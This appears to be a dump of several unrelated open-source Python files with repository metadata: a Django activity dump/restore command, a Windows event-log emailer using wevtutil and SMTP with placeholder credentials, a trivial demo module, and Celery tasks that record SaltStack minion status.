        if change:
            # get_or_create: the defaults only apply when the row is new; an
            # existing row is merged below instead of overwritten.
            activity, created = UserActivity.objects.get_or_create(user_profile=user_profile,
                                                                   query=query, client=client,
                                                                   defaults={"last_visit": last_visit,
                                                                             "count": count})
            if not created:
                activity.count += count
                activity.last_visit = max(last_visit, activity.last_visit)
                activity.save()
class Command(BaseCommand):
    # Management command for migrating UserActivity between deployments:
    # default mode dumps to ./dumped-activity; --restore reads it back in
    # (--dry-run / -n only prints what would change, writing nothing).
    option_list = BaseCommand.option_list + (
        make_option('--restore', default=False, action='store_true'),
        make_option('--dry-run', '-n', default=False, action='store_true'),)

    def handle(self, *args, **options):
        if options["restore"]:
            restore(change=not options['dry_run'])
        else:
            dump()
| apache-2.0 | Python | |
c56eab117a2cdf652ce816190e69ccb7a0b171f9 | Create EmailEventLog.py | schandok/EmailEventLog | EmailEventLog.py | EmailEventLog.py | '''
This module emails event logs since the last saved time stamp. If no time stamp exists (1st time), last 10 events will be sent.
This module can be attached as a task in Windows Event Viewer to be executed when certain event is logged.
Configure the params below to macth the event that triggered the module, such as logger and severity level (in cmdSinceLastTimeStamp).
All event details will be emailed. E.g: executing below command on command line, will show last 10 messages in System log with Level = Critical, Error or Warning. This would be the eact content of the email.
Test command: wevtutil qe "System" "/q:*[System [(Level<4)]]" /f:text /rd:true /c:10"
'''
import os
import re
import time
import smtplib
import datetime
# Configure params.
# In case using gmail for email, create a new App-specific password to avoid entering your main password. https://support.google.com/mail/answer/1173270?hl=en
# SECURITY NOTE: credentials are stored here in plain text — keep this file private.
TIMESTAMP_DIR = 'C:\\MC_Logger'  # directory where the last-seen timestamp file is kept
LOGGER = 'System' # Get list of loggers by executing 'wevtutil el' on command line.
SMTP_HOST = 'smtp.gmail.com'
SMTP_PORT = 587
SEND_TO = 'your_email@gmail.com'
USERNAME = 'your_email@gmail.com'
PASSWORD = 'your_passwd'

# Commands to query event log information. cmdSinceLastTimeStamp queries events AFTER the last timestamp with level 1-3 (Critical, Error, and Warning).
# cmdLast10 is the first-run fallback: the 10 most recent such events.
# To write a more custom wevtutil query, go to http://technet.microsoft.com/en-us/library/cc732848.aspx
cmdSinceLastTimeStamp = "wevtutil qe \"" + LOGGER + "\" \"/q:*[System [(Level<4) and TimeCreated[@SystemTime>'{0}']]]\" /f:text /rd:true"
cmdLast10 = "wevtutil qe \"" + LOGGER + "\" \"/q:*[System [(Level<4)]]\" /f:text /rd:true /c:10"
class EmailEventLog:
    """Emails Windows event-log entries recorded since the last saved timestamp.

    If the timestamp file does not exist yet (first run), the last 10 matching
    events are sent instead. After a successful email, the newest event's
    timestamp is persisted so the next run only reports newer events.
    """

    def __init__(self):
        self._TIMESTAMP_FILE = TIMESTAMP_DIR + '\\' + 'timeStamp.txt'

    def __exit__(self, exc_type=None, exc_value=None, traceback=None):
        # Accept the standard context-manager arguments with defaults: the
        # original no-argument signature would raise TypeError if this object
        # were ever used in a `with` block. (No cleanup is required.)
        pass

    def handleEvent(self):
        """Query the event log, email any new entries, persist the newest timestamp."""
        lastEventTimeStamp = self._getLastEventTimeStamp()
        # No saved timestamp -> fall back to querying the last 10 events.
        if lastEventTimeStamp is None:
            cmd = cmdLast10
        else:
            cmd = cmdSinceLastTimeStamp.format(lastEventTimeStamp)

        # Get the event text from wevtutil via the command line.
        evtLog = os.popen(cmd).read()

        # Events come newest-first (/rd:true), so the first "Date:" line holds
        # the newest event's timestamp. maxsplit=1 keeps the colons inside the
        # timestamp intact.
        timeStamp = None
        for line in evtLog.split("\n"):
            if 0 == line.strip().find("Date:"):
                timeStamp = line.split(":", 1)[1].strip()
                break

        # No "Date:" line means no events matched; treat as a false alarm.
        if timeStamp is None:
            return

        self._sendEmail(evtLog)

        # Save the new timestamp.
        # NOTE: If _sendEmail raised, we never reach this point, so the same
        # events are re-sent on the next run (intentional).
        self._updateTimeStamp(timeStamp)

    def _getLastEventTimeStamp(self):
        """Return the saved timestamp converted to UTC, or None if missing/invalid.

        wevtutil expects the timestamp with the UTC offset applied, so the
        locally-saved value is shifted by the current timezone offset.
        """
        try:
            # Context manager closes the handle (the original open(...).read()
            # leaked it).
            with open(self._TIMESTAMP_FILE, 'r') as ts_file:
                timeStamp = ts_file.read().strip()
        except IOError:
            return None
        # Ensure the timestamp is in the expected format, e.g. '2014-08-28T22:29:24.000'.
        # The dot before the milliseconds is escaped; the original unescaped '.'
        # matched any character.
        if None == re.match(r'^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{3}$', timeStamp):
            return None
        date_part, clock_part = timeStamp.split('T')
        date = date_part.split('-')
        clock = clock_part.replace('.', ':').split(':')  # [HH, MM, SS, milliseconds]
        # Seconds to add to local time to obtain UTC (DST-aware).
        offset = time.timezone if time.localtime().tm_isdst == 0 else time.altzone
        utcTimeStamp = datetime.datetime(int(date[0]), int(date[1]), int(date[2]),
                                         int(clock[0]), int(clock[1]), int(clock[2]),
                                         int(clock[3]) * 1000) + datetime.timedelta(0, offset)
        # isoformat() omits microseconds entirely when they are zero; otherwise
        # trim the 6-digit microseconds to 3-digit milliseconds.
        return utcTimeStamp.isoformat() if int(clock[3]) == 0 else utcTimeStamp.isoformat()[:-3]

    def _updateTimeStamp(self, timeStamp):
        """Persist *timeStamp* (local-time string) to the timestamp file."""
        # 'w+' truncates/creates; the context manager closes the handle
        # (the original open(...).write(...) leaked it).
        with open(self._TIMESTAMP_FILE, 'w+') as ts_file:
            ts_file.write(timeStamp)

    def _sendEmail(self, msg):
        """Send *msg* via SMTP with STARTTLS using the configured credentials."""
        smtpServer = smtplib.SMTP(SMTP_HOST, SMTP_PORT)
        try:
            smtpServer.ehlo()
            smtpServer.starttls()
            # Re-identify over the encrypted channel. The original wrote
            # `smtpServer.ehlo` without parentheses — a no-op attribute access.
            smtpServer.ehlo()
            smtpServer.login(USERNAME, PASSWORD)
            header = 'To: {0}\nFrom: {1}\nSubject: {2} \n\n'.format(SEND_TO, USERNAME, 'Mail from EmailEventLog')
            smtpServer.sendmail(USERNAME, SEND_TO, header + msg)
        finally:
            # Close the connection even if login/sendmail raised.
            smtpServer.close()
# Entry point when invoked by Windows Task Scheduler (or run manually).
if __name__ == '__main__':
    EmailEventLog().handleEvent()
| apache-2.0 | Python | |
9d76f77feebdf20b993385f7022334a4e964e0ad | Create ExampleImport.py | PhoduCoder/HelloWorld | ExampleImport.py | ExampleImport.py | #!/usr/bin/python
# Demo module: prints a message so callers can confirm it was imported/executed.
print ("This is from the ExampleImport Module")
| apache-2.0 | Python | |
e0a6f86983cb140f9686fe7a9d554707fbd32d52 | 添加celery 的tasks.py | yueyongyue/saltshaker,yueyongyue/saltshaker,yueyongyue/saltshaker | shaker/tasks.py | shaker/tasks.py | from celery import task
from shaker.shaker_core import *
from minions.models import Minions_status
from dashboard.models import *
from returner.models import *
import logging
logger = logging.getLogger('django')
sapi = SaltAPI()
@task()
def dashboard_task():
    """Collect minion up/down counts and key-acceptance counts from the
    Salt master and upsert them into the singleton Dashboard_status row
    (id=1)."""
    status = sapi.runner_status('status')
    key_status = sapi.list_all_key()
    up = len(status['up'])
    down = len(status['down'])
    accepted = len(key_status['minions'])
    unaccepted = len(key_status['minions_pre'])
    rejected = len(key_status['minions_rejected'])
    # get_or_create replaces the original try/bare-except, which would have
    # masked unrelated database errors, and avoids the redundant
    # create-then-update double write.
    obj, created = Dashboard_status.objects.get_or_create(
        id=1,
        defaults={'up': up, 'down': down, 'accepted': accepted,
                  'unaccepted': unaccepted, 'rejected': rejected})
    if not created:
        Dashboard_status.objects.filter(id=1).update(
            up=up, down=down, accepted=accepted,
            unaccepted=unaccepted, rejected=rejected)
@task()
def grains_task():
    """Refresh the cached grains of every responsive minion, then upsert a
    Minions_status row (version + Up/Down state) for every known minion."""
    status = sapi.runner_status('status')
    _refresh_grains(status['up'])
    _update_minion_status(status['up'], status['down'])


def _refresh_grains(up_minions):
    # Fetch grains.items from each responsive minion and upsert its cache row.
    # Narrow get_or_create replaces the original bare except, and a fresh row
    # per minion replaces the single shared model instance that was reused
    # (and re-saved) across loop iterations.
    for host_name in up_minions:
        grains = sapi.remote_noarg_execution(host_name, 'grains.items')
        obj, created = Salt_grains.objects.get_or_create(
            minion_id=host_name, defaults={'grains': grains})
        if not created:
            Salt_grains.objects.filter(minion_id=host_name).update(grains=grains)


def _stored_version(host_name):
    # Read the salt version out of the cached grains; 'Unknown' when no
    # grains are cached for this minion (e.g. it was never seen up).
    rows = Salt_grains.objects.filter(minion_id=host_name)
    if not rows:
        return 'Unknown'
    # grains is stored as a repr'd dict string; eval mirrors the original
    # storage format (NOTE: acceptable only because we wrote the string
    # ourselves in _refresh_grains).
    return eval(rows[0].grains).get('saltversion', 'Unknown').decode('string-escape')


def _update_minion_status(up_minions, down_minions):
    # Upsert one Minions_status row per minion with its own version and state.
    for host_name, state in [(h, 'Up') for h in up_minions] + [(h, 'Down') for h in down_minions]:
        # BUG FIX: the original reused the 'version' left over from the last
        # *up* minion for every down minion (and raised NameError when no
        # minion was up); look up each host's own cached version instead.
        version = _stored_version(host_name)
        obj, created = Minions_status.objects.get_or_create(
            minion_id=host_name,
            defaults={'minion_version': version, 'minion_status': state})
        if not created:
            Minions_status.objects.filter(minion_id=host_name).update(
                minion_version=version, minion_status=state)
# NOTE(review): commented-out legacy task kept for reference; its status
# handling duplicates what grains_task already does. Consider deleting.
'''
@task()
def minions_status_task():
    status = Minions_status()
    status_all = sapi.runner_status('status')
    for host_name in status_all['up']:
        salt_grains = Salt_grains.objects.filter(minion_id=host_name)
        version = eval(salt_grains[0].grains).get('saltversion').decode('string-escape')
        try:
            Minions_status.objects.get(minion_id=host_name)
        except:
            status.minion_id = host_name
            status.minion_version = version
            status.minion_status = 'Up'
            status.save()
        Minions_status.objects.filter(minion_id=host_name).update(minion_id=host_name, minion_version=version, minion_status='Up')
    for host_name in status_all['down']:
        try:
            Minions_status.objects.get(minion_id=host_name)
        except:
            status.minion_id = host_name
            status.minion_version = version
            status.minion_status = 'Down'
            status.save()
        Minions_status.objects.filter(minion_id=host_name).update(minion_id=host_name, minion_version=version, minion_status='Down')
'''
| apache-2.0 | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.